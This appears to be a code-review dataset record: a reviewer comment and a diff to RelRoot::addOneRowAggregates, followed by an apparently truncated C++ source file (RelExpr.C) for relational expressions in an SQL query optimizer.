!IsNullOrWhiteSpace(s)).Select(s => s.Trim()).ToArray(); } return result; } } }
1
22,483
Do you find this really easier to read?
NLog-NLog
.cs
@@ -11388,8 +11388,9 @@ void RelRoot::setMvBindContext(MvBindContext * pMvBindContext) pMvBindContextForScope_ = pMvBindContext; } -void RelRoot::addOneRowAggregates(BindWA* bindWA) +NABoolean RelRoot::addOneRowAggregates(BindWA* bindWA, NABoolean forceGroupByAgg) { + NABoolean GroupByAggNodeAdded = FALSE; RelExpr * childOfRoot = child(0); GroupByAgg *aggNode = NULL; // If the One Row Subquery is already enforced by a scalar aggregate
1
/*********************************************************************** // @@@ START COPYRIGHT @@@ // // Licensed to the Apache Software Foundation (ASF) under one // or more contributor license agreements. See the NOTICE file // distributed with this work for additional information // regarding copyright ownership. The ASF licenses this file // to you under the Apache License, Version 2.0 (the // "License"); you may not use this file except in compliance // with the License. You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, // software distributed under the License is distributed on an // "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY // KIND, either express or implied. See the License for the // specific language governing permissions and limitations // under the License. // // @@@ END COPYRIGHT @@@ **********************************************************************/ /* -*-C++-*- ****************************************************************************** * * File: RelExpr.C * Description: Relational expressions (both physical and logical operators) * Created: 5/17/94 * Language: C++ * * ****************************************************************************** */ #define SQLPARSERGLOBALS_FLAGS // must precede all #include's #define SQLPARSERGLOBALS_NADEFAULTS #include "Debug.h" #include "Sqlcomp.h" #include "AllRelExpr.h" #include "AllItemExpr.h" #include "GroupAttr.h" #include "opt.h" #include "PhyProp.h" #include "mdam.h" #include "ControlDB.h" #include "disjuncts.h" #include "ScanOptimizer.h" #include "CmpContext.h" #include "StmtDDLCreateTrigger.h" #include "ExpError.h" #include "ComTransInfo.h" #include "BindWA.h" #include "Refresh.h" #include "CmpMain.h" #include "ControlDB.h" #include "ElemDDLColDef.h" #include "Analyzer.h" #include "OptHints.h" #include "ComTdbSendTop.h" #include "DatetimeType.h" #include "SequenceGeneratorAttributes.h" #include "SqlParserGlobals.h" #include "AppliedStatMan.h" #include "Generator.h" #include "CmpStatement.h" #define TEXT_DISPLAY_LENGTH 1001 // ---------------------------------------------------------------------- // forward declarations // ---------------------------------------------------------------------- // ----------------------------------------------------------------------- // methods for class ExprGroupId // ----------------------------------------------------------------------- ExprGroupId::ExprGroupId() { groupIdMode_ = STANDALONE; node_ = NULL; groupId_ = INVALID_GROUP_ID; } ExprGroupId::ExprGroupId(const ExprGroupId & other) { groupIdMode_ = other.groupIdMode_; node_ = other.node_; groupId_ = other.groupId_; } ExprGroupId::ExprGroupId(RelExpr *node) { groupIdMode_ = STANDALONE; node_ = node; groupId_ = INVALID_GROUP_ID; } ExprGroupId::ExprGroupId(CascadesGroupId groupId) { groupIdMode_ = MEMOIZED; node_ = NULL; groupId_ = groupId; } ExprGroupId & ExprGroupId::operator = (const ExprGroupId & other) { groupIdMode_ = other.groupIdMode_; node_ = other.node_; groupId_ = other.groupId_; return *this; } ExprGroupId & ExprGroupId::operator = (RelExpr * other) { if (groupIdMode_ == MEMOIZED) { // Trying to assign an actual pointer to an ExprGroupId that // is in CascadesMemo. This is materialization of a binding. groupIdMode_ = BINDING; } else if (groupIdMode_ == BINDING) // sanity check, can't directly overwrite another binding ABORT("Didn't call BINDING::release_expr()"); node_ = other; return *this; } ExprGroupId & ExprGroupId::operator = (CascadesGroupId other) { // The expression is now (again) in CascadesMemo without participating in // a binding. This may happen when an expression is copied into CascadesMemo // (groupIdMode_ was STANDALONE) or when a binding is released (groupIdMode_ // was BINDING). The node_ member is no longer a valid pointer. if (groupIdMode_ == BINDING && groupId_ != other) ABORT("can't change group of an expression during release of binding"); groupIdMode_ = MEMOIZED; groupId_ = other; node_ = NULL; return *this; } NABoolean ExprGroupId::operator == (const ExprGroupId &other) const { // if the two operands have mode ... then do this: // ---------------------------------------- ------------------ // STANDALONE-STANDALONE: ptrs must match // STANDALONE-MEMOIZED: (x) return FALSE // STANDALONE-BINDING: ptrs must match // MEMOIZED-MEMOIZED: (x) groups must match // MEMOIZED-BINDING: (x) groups must match // BINDING-BINDING: ptrs must match if (node_ == NULL OR other.getPtr() == NULL) return (groupId_ == other.getGroupId()); // cases with (x) else return (node_ == other.getPtr()); // ptrs must match } NABoolean ExprGroupId::operator == (const RelExpr *other) const { CMPASSERT(groupIdMode_ != MEMOIZED); return node_ == other; } CascadesGroupId ExprGroupId::getGroupId() const { return ((groupIdMode_ != STANDALONE)? groupId_ : INVALID_GROUP_ID); } void ExprGroupId::releaseBinding() { if (groupIdMode_ != BINDING) ABORT("binding to release was not established"); groupIdMode_ = MEMOIZED; node_ = NULL; } void ExprGroupId::convertBindingToStandalone() { groupIdMode_ = STANDALONE; } void ExprGroupId::setGroupAttr(GroupAttributes *gaPtr) { // If the expression is either in the standalone mode or is // a part of a binding, then store the Group Attributes // in the node. Group attributes in Cascades can not be set through // an individual expression and an attempt to do this results in an abort. CMPASSERT(groupIdMode_ == STANDALONE); node_->setGroupAttr(gaPtr); } // ExprGroupId::setGroupAttr() GroupAttributes * ExprGroupId::getGroupAttr() const { CMPASSERT(node_ != NULL OR groupIdMode_ == MEMOIZED); // If the expression is either in the standalone mode or is // a part of a binding, then use the Group Attributes that // are stored in the node. if (node_ != NULL) return node_->getGroupAttr(); else // otherwise, use the Cascades group's group attributes return (*CURRSTMT_OPTGLOBALS->memo)[groupId_]->getGroupAttr(); } // ExprGroupId::getGroupAttr() // shortcut to get the output estimated log props out of the group // attributes EstLogPropSharedPtr ExprGroupId::outputLogProp(const EstLogPropSharedPtr& inputLogProp) { return getGroupAttr()->outputLogProp(inputLogProp); } // a shortcut to get the bound expression, if it exists ... // or the first logical expression inserted in the Cascades Group or NULL. // Note: The last log expr in the list is the first one inserted. RelExpr * ExprGroupId::getLogExpr() const { if (node_ != NULL) return node_; else if (groupId_ != INVALID_GROUP_ID) return ((*CURRSTMT_OPTGLOBALS->memo)[groupId_]->getLastLogExpr()); return 0; } RelExpr * ExprGroupId::getFirstLogExpr() const { if (node_ != NULL) return node_; else if (groupId_ != INVALID_GROUP_ID) return ((*CURRSTMT_OPTGLOBALS->memo)[groupId_]->getFirstLogExpr()); return 0; } // ----------------------------------------------------------------------- // member functions for class RelExpr // ----------------------------------------------------------------------- THREAD_P ObjectCounter (*RelExpr::counter_)(0); RelExpr::RelExpr(OperatorTypeEnum otype, RelExpr *leftChild, RelExpr *rightChild, CollHeap *outHeap) : ExprNode(otype) ,selection_(NULL) ,RETDesc_(NULL) ,groupAttr_(NULL) ,groupId_(INVALID_GROUP_ID) ,groupNext_(NULL) ,bucketNext_(NULL) ,operatorCost_(NULL) ,rollUpCost_(NULL) ,physProp_(NULL) ,estRowsUsed_((Cardinality)-1) ,inputCardinality_((Cardinality)-1) ,maxCardEst_((Cardinality)-1) ,contextInsensRules_(outHeap) ,contextSensRules_(outHeap) ,accessSet0_(NULL) // Triggers -- ,accessSet1_(NULL) ,uniqueColumnsTree_(NULL) //++MV ,cardConstraint_(NULL) //++MV ,isinBlockStmt_(FALSE) ,firstNRows_(-1) ,flags_(0) ,rowsetIterator_(FALSE) ,tolerateNonFatalError_(UNSPECIFIED_) ,hint_(NULL) ,markedForElimination_(FALSE) ,isExtraHub_(FALSE) ,potential_(-1) ,seenIUD_(FALSE) ,parentTaskId_(0) ,stride_(0) ,birthId_(0) ,memoExprId_(0) ,sourceMemoExprId_(0) ,sourceGroupId_(0) ,costLimit_(-1) ,cachedTupleFormat_(ExpTupleDesc::UNINITIALIZED_FORMAT) ,cachedResizeCIFRecord_(FALSE) ,dopReduced_(FALSE) ,originalExpr_(NULL) ,operKey_(outHeap) { child_[0] = leftChild; child_[1] = rightChild; (*counter_).incrementCounter(); // QSTUFF setGroupAttr(new (outHeap) GroupAttributes); // QSTUFF } RelExpr::~RelExpr() { // the group attributes maintain a reference count if (groupAttr_ != NULL) groupAttr_->decrementReferenceCount(); // these data structures are always owned by the tree delete selection_; // delete all children, if this is a standalone query // (NOTE: can't use the virtual function getArity() in a destructor!!!) for (Lng32 i = 0; i < MAX_REL_ARITY; i++) { if (child(i).getMode() == ExprGroupId::STANDALONE) { // the input was not obtained from CascadesMemo, so delete it if (child(i).getPtr() != NULL) delete child(i).getPtr(); } } (*counter_).decrementCounter(); delete cardConstraint_; //++MV if (hint_) delete hint_; } // RelExpr::~RelExpr() Int32 RelExpr::getArity() const { switch (getOperatorType()) { case REL_SCAN: return 0; case REL_EXCHANGE: return 1; case REL_JOIN: case REL_TSJ: case REL_ROUTINE_JOIN: case REL_SEMIJOIN: case REL_SEMITSJ: case REL_ANTI_SEMIJOIN: case REL_ANTI_SEMITSJ: case REL_LEFT_JOIN: case REL_FULL_JOIN: case REL_LEFT_TSJ: case REL_NESTED_JOIN: case REL_MERGE_JOIN: case REL_INTERSECT: case REL_EXCEPT: return 2; default: ABORT("RelExpr with unknown arity encountered"); return 0; } } void RelExpr::deleteInstance() { Int32 nc = getArity(); // avoid deleting the children by resetting all child pointers first for (Lng32 i = 0; i < nc; i++) { child(i) = (RelExpr *) NULL; } delete this; } // RelExpr::deleteInstance() TableMappingUDF *RelExpr::castToTableMappingUDF() { return NULL; } ExprNode * RelExpr::getChild(Lng32 index) { return child(index); } // RelExpr::getChild() void RelExpr::setChild(Lng32 index, ExprNode * newChild) { if (newChild) { CMPASSERT(newChild->castToRelExpr()); child(index) = newChild->castToRelExpr(); } else child(index) = (RelExpr *)NULL; } // RelExpr::setChild() // get TableDesc from the expression. It could be directly // attached to the expression, as in Scan, or could be a // part of GroupAnalysis, as in cut-opp. For expressions // which do not have a tableDesc attached to them, like Join // it would be NULL TableDesc* RelExpr::getTableDescForExpr() { TableDesc * tableDesc = NULL; if (getOperatorType() == REL_SCAN) { tableDesc = ((Scan *)this)->getTableDesc(); } else { if(getGroupAttr()->getGroupAnalysis() && getGroupAttr()->getGroupAnalysis()->getNodeAnalysis() ) { TableAnalysis * tableAnalysis = getGroupAttr()->getGroupAnalysis()->getNodeAnalysis()->getTableAnalysis(); if (tableAnalysis) tableDesc = tableAnalysis->getTableDesc(); } } return tableDesc; } // This method clears all logical expressions uptill the leaf node // for multi-join. The methid should be called only before optimization phases // Reason for that is (1)it is very expensive to synthLogProp and should be avoided // (2) we are resetting number of joined tables, which should not be done once it is // set during optimization phases void RelExpr::clearLogExprForSynthDuringAnalysis() { Int32 numChildren = getArity(); if (numChildren >= 1) { GroupAttributes * grp = getGroupAttr(); grp->setLogExprForSynthesis(NULL); grp->resetNumJoinedTables(1); } // clear the log expr for all children for (Lng32 i = 0; i < numChildren; i++) { // only if the child is not a CascadesGroup or NULL if (child(i).getPtr() != NULL) { child(i)->clearLogExprForSynthDuringAnalysis(); } } } void RelExpr::releaseBindingTree(NABoolean memoIsMoribund) { Int32 nc = getArity(); for (Lng32 i = 0; i < nc; i++) { if (memoIsMoribund || child(i).getMode() == ExprGroupId::BINDING) { // recursively release the bindings of the children's children if (child(i).getPtr() != NULL) child(i)->releaseBindingTree(memoIsMoribund); // release the bindings to the children child(i).convertBindingToStandalone(); } } // for each child // indicate that this expression is no longer part of CascadesMemo, // (although its groupNext_ and bucketNext_ pointers are still valid) groupId_ = INVALID_GROUP_ID; if (memoIsMoribund) { groupAttr_ = NULL; groupNext_ = bucketNext_ = NULL; } } void RelExpr::addSelPredTree(ItemExpr *selpred) { ExprValueId sel = selection_; ItemExprTreeAsList(&sel, ITM_AND).insert(selpred); selection_ = sel.getPtr(); } // RelExpr::addSelPredTree() ItemExpr * RelExpr::removeSelPredTree() { ItemExpr * result = selection_; selection_ = NULL; return result; } // RelExpr::removeSelPredTree() //++ MV - void RelExpr::addUniqueColumnsTree(ItemExpr *uniqueColumnsTree) { ExprValueId t = uniqueColumnsTree_; ItemExprTreeAsList(&t, ITM_ITEM_LIST).insert(uniqueColumnsTree); uniqueColumnsTree_ = t.getPtr(); } ItemExpr *RelExpr::removeUniqueColumnsTree() { ItemExpr *result = uniqueColumnsTree_; uniqueColumnsTree_ = NULL; return result; } // MV-- void RelExpr::setGroupAttr(GroupAttributes *gaPtr) { // the new group attributes are now used in one more place if (gaPtr != NULL) gaPtr->incrementReferenceCount(); // the old group attributes are now used in one place less than before // NOTE: old and new group attribute pointers may be the same if (groupAttr_ != NULL) groupAttr_->decrementReferenceCount(); // now assign the new group attribute pointer to the local data member groupAttr_ = gaPtr; } NABoolean RelExpr::reconcileGroupAttr(GroupAttributes *newGroupAttr) { // make sure the new group attributes have all the information needed // and are not inconsistent newGroupAttr->reconcile(*groupAttr_); // unlink from the current group attributes and adopt the new (compatible) // ones setGroupAttr(newGroupAttr); return FALSE; // no re-optimization for now } RelExpr * RelExpr::castToRelExpr() { return this; } const RelExpr * RelExpr::castToRelExpr() const { return this; } NABoolean RelExpr::isLogical() const { return TRUE; } NABoolean RelExpr::isPhysical() const { return FALSE; } NABoolean RelExpr::isCutOp() const { return FALSE; } NABoolean RelExpr::isSubtreeOp() const { return FALSE; } NABoolean RelExpr::isWildcard() const { return FALSE; } ItemExpr * RelExpr::selectList() { // RelRoot redefines this virtual method (see BindRelExpr.cpp); // Tuple and Union use this standard method. RETDesc *rd = getRETDesc(); if (rd) { ValueIdList vids; const ColumnDescList &cols = *rd->getColumnList(); for (CollIndex i = 0; i < cols.entries(); i++) vids.insert(cols[i]->getValueId()); return vids.rebuildExprTree(ITM_ITEM_LIST); } return NULL; } SimpleHashValue RelExpr::hash() { // this method is just defined to have a hash method in ExprNode // without referencing class HashValue (which is too complicated // for the common code directory) return treeHash().getValue(); } HashValue RelExpr::topHash() { HashValue result = (Int32) getOperatorType(); // hash the required input and output values from the GroupAttributes if (groupAttr_ != NULL) result ^= groupAttr_->hash(); // hash the ValueIdSet of the selection predicates result ^= predicates_; // the other data members are not significant for the hash function CMPASSERT(selection_ == NULL); // this method doesn't work in the parser return result; } // this method is not virtual, since combining the hash values of the // top node and its children should be independent of the actual node HashValue RelExpr::treeHash() { HashValue result = topHash(); Int32 maxc = getArity(); for (Lng32 i = 0; i < maxc; i++) { if (child(i).getMode() == ExprGroupId::MEMOIZED) // use the numbers of the input CascadesGroup result ^= child(i).getGroupId(); else // call this method recursively for the children result ^= child(i)->treeHash(); } return result; } NABoolean RelExpr::patternMatch(const RelExpr & other) const { return getOperator().match(other.getOperator()); } // Checks if the selection preds at this join node are of the // form FKtable.col1 = UKTable.col1 and FKtable.col1 = UKTable.col1 // and ..., where FKTable.col1 is the FK column that points to // UKTable.col1. // The third arguments matchingPreds is an output parameter. // It is used to send the a list of FKtable.col1 = UKTable.col1 // type predicates back to the caller, so that it can be used // to adjust the selection preds and equiJoinPreds in the join // node. NABoolean Join::hasRIMatchingPredicates(const ValueIdList& fkCols, const ValueIdList& ucCols, const TableDesc * compRefTabId, ValueIdSet & matchingPreds) const { // if the size of the fkCols does not match with ucCols then something is wrong. // We also assume below that corresponding cols have identical positions // in the two valueidlists and that all entries here are in terms of VEG. CMPASSERT(fkCols.entries() == ucCols.entries()); // There is not possibility of finding a full match // if number ofselection preds is smaller than the fkCols. // number of selection preds can be larger than fkCols.entries, // for example there may be a predicate on the fktable and some // other table which is being joined up above. Since the fktable // is below this join, this join will have that predicate. if ((getSelectionPredicates().entries() < fkCols.entries())) return FALSE; ValueIdList localFKCols(fkCols); ValueIdList localUCCols(ucCols); ValueIdSet compRefTabNonUCCols(compRefTabId->getColumnVEGList()); ValueIdSet localUCColsSet(localUCCols); compRefTabNonUCCols -= localUCColsSet; NABoolean matchFound = FALSE; const ValueIdSet& selPreds = getSelectionPredicates(); matchingPreds.clear(); for (ValueId x = selPreds.init(); selPreds.next(x); selPreds.advance(x)) { ItemExpr *ie = x.getItemExpr(); matchFound = FALSE; if (ie->getOperatorType() == ITM_VEG_PREDICATE) { ValueId vegRef = ((VEGPredicate *)ie)->getVEG()->getVEGReference()->getValueId(); CollIndex fkidx = localFKCols.index(vegRef); if ((fkidx != NULL_COLL_INDEX)&&(localUCCols[fkidx] == vegRef)) { localFKCols.removeAt(fkidx); localUCCols.removeAt(fkidx); matchingPreds.insert(x); } if (compRefTabNonUCCols.contains(vegRef)) { // return false on a predicate // of the form fktable.x = uniquetable.x where x is a nonkey column. matchingPreds.clear(); return FALSE; } } else if ((ie->getOperatorType() == ITM_EQUAL)&& (ie->child(0)->getOperatorType() == ITM_VEG_REFERENCE)&& (ie->child(1)->getOperatorType() == ITM_VEG_REFERENCE)) { ValueId vegRef0 = ((VEGReference *)ie->child(0).getPtr())->getValueId(); ValueId vegRef1 = ((VEGReference *)ie->child(1).getPtr())->getValueId(); ValueId ukVid = NULL_COLL_INDEX; CollIndex fkidx = localFKCols.index(vegRef0); if (fkidx == NULL_COLL_INDEX) { CollIndex fkidx = localFKCols.index(vegRef1); if (fkidx != NULL_COLL_INDEX) ukVid = vegRef0; } else ukVid = vegRef1; if ((fkidx != NULL_COLL_INDEX)&&(localUCCols[fkidx] == ukVid)) { localFKCols.removeAt(fkidx); localUCCols.removeAt(fkidx); matchingPreds.insert(x); } } else { matchingPreds.clear(); return FALSE; // not a VEG Pred (revisit for char-varchar) } } if (localFKCols.isEmpty()) return TRUE ; // all preds have a match with a FK-UC column pair. else { matchingPreds.clear(); return FALSE; } } // Special method added to check for ordered cross product called by // RequiredPhysicalProperty::satisfied() to ensure that if a CQS has // requested an ordered cross product, then one is being produced. NABoolean HashJoin::patternMatch(const RelExpr &other) const { if (other.getOperator() == REL_FORCE_ORDERED_CROSS_PRODUCT) return ((HashJoin *) this)->isOrderedCrossProduct(); else return RelExpr::patternMatch(other); } // Two trees match, if their top nodes and their children are duplicates // (are the same logical or physical expression). This method provides // the generic part for determining a match. It can be called by // redefined virtual methods of derived classes. NABoolean RelExpr::duplicateMatch(const RelExpr & other) const { if (getOperatorType() != other.getOperatorType()) return FALSE; CMPASSERT(selection_ == NULL); // this method doesn't work in the parser if (predicates_ != other.predicates_) return FALSE; if (rowsetIterator_ != other.rowsetIterator_) return FALSE; if (tolerateNonFatalError_ != other.tolerateNonFatalError_) return FALSE; Int32 maxc = getArity(); // determine whether the children match for (Lng32 i = 0; i < maxc; i++) { // different situations, depending on whether the child // and the other node's child is in state MEMOIZED, // BINDING, or STANDALONE. See ExprGroupId::operator == // for an explanation for each of the cases if (child(i).getMode() == ExprGroupId::MEMOIZED OR other.child(i).getMode() == ExprGroupId::MEMOIZED) { // cases marked (x) in ExprGroupId::operator == // (groups must match) if (NOT (child(i) == other.child(i))) return FALSE; } else { // outside of CascadesMemo or in a CascadesBinding, then // call this method recursively for the children if (NOT child(i)->duplicateMatch(*other.child(i).getPtr())) return FALSE; } } return TRUE; } const CorrName RelExpr::invalid = CorrName("~X~invalid"); RelExpr * RelExpr::copyTopNode(RelExpr *derivedNode,CollHeap* outHeap) { RelExpr *result; if (derivedNode == NULL) result = new (outHeap) RelExpr(getOperatorType(), NULL, NULL, outHeap); else result = derivedNode; // don't copy pointers to required input/output values, since we don't // allow duplicate expressions the new node is likely to get new group // attributes // copy selection predicates result->predicates_ = predicates_; // copy pointer to the selection expression tree (Parser only) if (selection_ != NULL) result->selection_ = selection_->copyTree(outHeap)->castToItemExpr(); // -- Triggers // Copy the inlining information and access sets. result->getInliningInfo().merge(&getInliningInfo()); result->setAccessSet0(getAccessSet0()); result->setAccessSet0(getAccessSet0()); //++MV - result->setUniqueColumns(getUniqueColumns()); if (uniqueColumnsTree_ != NULL) result->uniqueColumnsTree_ = uniqueColumnsTree_->copyTree(outHeap)->castToItemExpr(); //--MV - // leave any physical properties or CascadesMemo-related data // off the returned result ??? (see RelExpr::save) result->setBlockStmt(isinBlockStmt()); result->setFirstNRows(getFirstNRows()); result->oltOptInfo() = oltOptInfo(); result->setHint(getHint()); result->setRowsetIterator(isRowsetIterator()); result->setTolerateNonFatalError(getTolerateNonFatalError()); result->setIsExtraHub(isExtraHub()); result->setMarkedForElimination(markedForElimination()); result->seenIUD_ = seenIUD_; // set the expression's potential result->potential_ = potential_; // copy cascades trace info result->parentTaskId_ = parentTaskId_; result->stride_ = stride_; result->birthId_ = birthId_; result->memoExprId_ = memoExprId_; result->sourceMemoExprId_ = sourceMemoExprId_; result->sourceGroupId_ = sourceGroupId_; result->costLimit_ = costLimit_; result->originalExpr_ = this; return result; } // this method is not virtual, since combining the copies of the // top node and its children should be independent of the actual node RelExpr * RelExpr::copyTree(CollHeap* outHeap) { RelExpr * result = copyTopNode(0,outHeap); Int32 arity = getArity(); for (Lng32 i = 0; i < arity; i++) result->child(i) = child(i)->copyTree(outHeap); return result; } // this method is also not virtual, It does same thing as copyTree // except that it copies the RETDesc and groupAttr pointers too // this is method is used to get a copy of the original tree before // inserting it to Cascades. RelExpr * RelExpr::copyRelExprTree(CollHeap* outHeap) { RelExpr * result = copyTopNode(0,outHeap); result->setGroupAttr(new (outHeap) GroupAttributes(*(getGroupAttr()))); result->setRETDesc(getRETDesc()); result->getGroupAttr()->setLogExprForSynthesis(result); Int32 arity = getArity(); for (Lng32 i = 0; i < arity; i++) result->child(i) = child(i)->copyRelExprTree(outHeap); return result; } const RelExpr * RelExpr::getOriginalExpr(NABoolean transitive) const { if (originalExpr_ == NULL) return this; RelExpr *result = originalExpr_; while (result->originalExpr_ && transitive) result = result->originalExpr_; return result; } RelExpr * RelExpr::getOriginalExpr(NABoolean transitive) { if (originalExpr_ == NULL) return this; RelExpr *result = originalExpr_; while (result->originalExpr_ && transitive) result = result->originalExpr_; return result; } void RelExpr::setBlockStmtRecursively(NABoolean x) { setBlockStmt(x); Int32 arity = getArity(); for (Lng32 i = 0; i < arity; i++) child(i)->setBlockStmtRecursively(x); } // ----------------------------------------------------------------------- // create or share an optimization goal for a child group // ----------------------------------------------------------------------- Context * RelExpr::shareContext(Lng32 childIndex, const ReqdPhysicalProperty* const reqdPhys, const InputPhysicalProperty* const inputPhys, CostLimit* costLimit, Context * parentContext, const EstLogPropSharedPtr& inputLogProp, RelExpr *explicitlyRequiredShape) const { // no need to do the job if costLimit id already negative if ( costLimit AND CURRSTMT_OPTDEFAULTS->OPHpruneWhenCLExceeded() AND costLimit->getValue(reqdPhys) < 0 ) return NULL; const ReqdPhysicalProperty* searchForRPP; // if the required physical properties are empty, don't use them if (reqdPhys != NULL AND reqdPhys->isEmpty()) searchForRPP = NULL; else searchForRPP = reqdPhys; // handle force plan directives: if the parent node must match a // certain tree, make sure the child node gets the appropriate // requirement to match a child node of the mustMatch pattern RelExpr *childMustMatch = explicitlyRequiredShape; if (parentContext->getReqdPhysicalProperty() != NULL AND parentContext->getReqdPhysicalProperty()->getMustMatch() != NULL AND explicitlyRequiredShape == NULL) { const RelExpr *parentMustMatch = parentContext->getReqdPhysicalProperty()->getMustMatch(); // Reuse the parent's pattern if this node is a map value ids // node and the required pattern isn't. This is because a map value // ids node, PACK node and UNPACK node is essentially a no-op and // does not need to be specified in CONTROL QUERY SHAPE. // Sorry for putting this DBI code into // places where particular operator types shouldn't be known. // It's the summer of 1997 and we have a deadline for FCS. // Its (almost) summer of 2003 and I am adding the same thingy // for FIRST_N operator. if (((getOperatorType() == REL_MAP_VALUEIDS) && (parentMustMatch->getOperatorType() != REL_MAP_VALUEIDS)) || ((getOperatorType() == REL_PACK) AND (parentMustMatch->getOperatorType() != REL_PACK)) || ((getOperatorType() == REL_UNPACKROWS) AND (parentMustMatch->getOperatorType() != REL_UNPACKROWS)) || ((getOperatorType() == REL_FIRST_N) AND (parentMustMatch->getOperatorType() != REL_FIRST_N)) || (CURRSTMT_OPTDEFAULTS->ignoreExchangesInCQS() AND (getOperatorType() == REL_EXCHANGE) AND (parentMustMatch->getOperatorType() != REL_FORCE_EXCHANGE)) || (CURRSTMT_OPTDEFAULTS->ignoreSortsInCQS() AND (getOperatorType() == REL_SORT) AND (parentMustMatch->getOperatorType() != REL_SORT))) { childMustMatch = (RelExpr *) parentMustMatch; } else { // If the "must match" pattern specifies something other than // a cut op for child "childIndex" then this is our new "must match". if (childIndex < parentMustMatch->getArity() AND NOT parentMustMatch->child(childIndex)->isCutOp()) childMustMatch = parentMustMatch->child(childIndex); } } if (childMustMatch != NULL OR searchForRPP AND searchForRPP->getMustMatch() != NULL) { // we have to change the "must match" attribute of searchForRPP // add the "mustMatch" requirement if (searchForRPP != NULL) { searchForRPP = new (CmpCommon::statementHeap()) ReqdPhysicalProperty(*searchForRPP, childMustMatch); } else searchForRPP = new (CmpCommon::statementHeap()) ReqdPhysicalProperty(childMustMatch); } return (*CURRSTMT_OPTGLOBALS->memo)[child(childIndex).getGroupId()]->shareContext(searchForRPP, inputPhys, costLimit, parentContext, inputLogProp); } // RelExpr::shareContext() ULng32 RelExpr::getDefault(DefaultConstants id) { return ActiveSchemaDB()->getDefaults().getAsULong(id); } void RelExpr::addLocalExpr(LIST(ExprNode *) &xlist, LIST(NAString) &llist) const { if (selection_ != NULL OR NOT predicates_.isEmpty()) { if (predicates_.isEmpty()) xlist.insert(selection_); else xlist.insert(predicates_.rebuildExprTree()); llist.insert("selection_predicates"); } if(NOT uniqueColumns_.isEmpty()) { xlist.insert(uniqueColumns_.rebuildExprTree()); llist.insert("uniqueColumns_"); } } //QSTUFF // we must pushdown the outputs of a genericupdate root to its // descendants to ensure that only those required output values are // tested against indexes when selecting an index for a stream scan // followed by an embedded update. Since we may allow for unions and // for inner updates we just follow the isEmbeddedUpdate() thread once // we reach a generic update root. void RelExpr::pushDownGenericUpdateRootOutputs( const ValueIdSet &outputs) { ValueIdSet rootOutputs = getGroupAttr()->isGenericUpdateRoot() ? getGroupAttr()->getCharacteristicOutputs() : outputs; for (Int32 i=0; i < getArity(); i++) { if (child(i)->castToRelExpr()->getGroupAttr()->isEmbeddedUpdateOrDelete()){ child(i)->castToRelExpr()-> pushDownGenericUpdateRootOutputs(rootOutputs); } } if (NOT rootOutputs.isEmpty()){ getGroupAttr()->setGenericUpdateRootOutputs(rootOutputs); } } //QSTUFF void RelExpr::needSortedNRows(NABoolean val) { // The operators listed below can create OR propogate a GET_N // request. Other operatots will turn a GET_N request into GET_ALL // There are a few exceptions like right side of NJ for semi join etc. // but these are not relevant for FirstN sort // This method should only in the generator since we are using // physical node types. OperatorTypeEnum operatorType = getOperatorType(); if ((operatorType != REL_FIRST_N) && (operatorType != REL_EXCHANGE) && (operatorType != REL_MERGE_UNION) && (operatorType != REL_PROBE_CACHE) && (operatorType != REL_ROOT) && (operatorType != REL_LEFT_NESTED_JOIN) && (operatorType != REL_LEFT_TSJ) && (operatorType != REL_MAP_VALUEIDS)) return ; if ((operatorType == REL_LEFT_NESTED_JOIN) || (operatorType == REL_LEFT_TSJ)) { // left side of left tsj propagates a GET_N request if afterPred is empty. if (getSelectionPred().isEmpty()) child(0)->castToRelExpr()->needSortedNRows(val); return ; } for (Int32 i=0; i < getArity(); i++) { if (child(i)) child(i)->castToRelExpr()->needSortedNRows(val); } } // ----------------------------------------------------------------------- // computeValuesReqdForPredicates() // // There has been some problems with this function (as to how it should // behave). The issue has been whether we should allow an operator to // have the boolean value of a predicate as its output. That is to say, // whether (SCAN T1), for example, could evaluate a predicate such as // (T1.a > 3) and output a value of true or false to its parent. // // In most cases, this wouldn't be an issue since the predicate is used // to filter out all the non-qualified rows. However, such is not the // case when a CASE statement is involved. Part of the CASE statement, // (e.g. the WHEN clause) can be evaluated at the SCAN, while the rest // of the statement could reference some other tables and therefore must // be evaluated at an ancestor node of the tree. // // A complete example is SELECT CASE WHEN T1.A > 3 THEN T2.A ELSE 0 END // FROM T1 JOIN T2 ON T1.C = T2.C. In this case, if we allow a boolean // value to be our output, the (T1.A > 3) could be evaluated at SCAN T1, // and the CASE statement itself at the JOIN. The alternative would be // for SCAN T1 to output T1.A and the CASE statement evaluated wholly at // the JOIN. // // Now, how do all these relate to this function? The purpose of this // function is to turn a predicate into values required to evaluate the // predicate. Thus, the question is: should we allow the boolean value // of (T1.A > 3) be the value required to evaluate the predicate (T1.A > // 3). Or, should the values be T1.A and 3 instead? More generally, // should we go for the leaf values of a non-VEG predicate (there is a // separate story for VEG predicates, see later) or just the bool value // of that predicate? // // This function has been implemented to gather the leaf values. However, // there is no reason why we could // not just require the boolean value. The logic of predicate pushdown // mandates that if the child of the operator is unable to produce that // boolean value, it will figure out what sub-expressions it could produce // in its outputs in order for the boolean value to be evaluated at its // parent. // // On the other hand, since this function has not been changed for quite // a while, we are worried the change might trigger problematic spots in // other places which rely on this function behaving the way it has been. // Through extensive testing, we didn't seem to identify any problems and // therefore, we decided to commit this fix. // // Now for VEGPred's. A VEGPred is considered "evaluable" at an operator // if any *one* of its VEG members is "evaluable". For example, VEGPred( // VEG{T1.a,T2.a}) in the query SELECT T2.B FROM (T1 JOIN T2 ON T1.A = // T2.A) is "evaluable" at SCAN T1 and will be pushed down. Clearly, only // evaluating the predicate there is not enough. We have to keep the // VEGPred at the JOIN as well. The logic in Join::pushdownCoveredExpr() // correctly handle that now. That is, it keeps the predicate even if // it has been pushed down. However, doing so means that in the example // given, SCAN T1 has to return T1.A as an output rather than just the // boolean value of VEGPred(VEG{T1.A,T2.A}). That boolean value is sort // of only local to SCAN T1. This function, therefore, declares that the // value required to evaluate a VEGPred is not the boolean value of the // VEGPred itself but the VEGRef of its VEG. In our example, the required // value is VEGRef(VEG{T1.A,T2.A}). The semantics of this is that SCAN T1 // is asked to return as an output one of the VEG members available to // it. The pre-code generator will thus change this VEGRef into T1.A. // // 8/14/1998 // // ----------------------------------------------------------------------- void RelExpr::computeValuesReqdForPredicates(const ValueIdSet& setOfExpr, ValueIdSet& reqdValues, NABoolean addInstNull) { for (ValueId exprId = setOfExpr.init(); setOfExpr.next(exprId); setOfExpr.advance(exprId)) { if 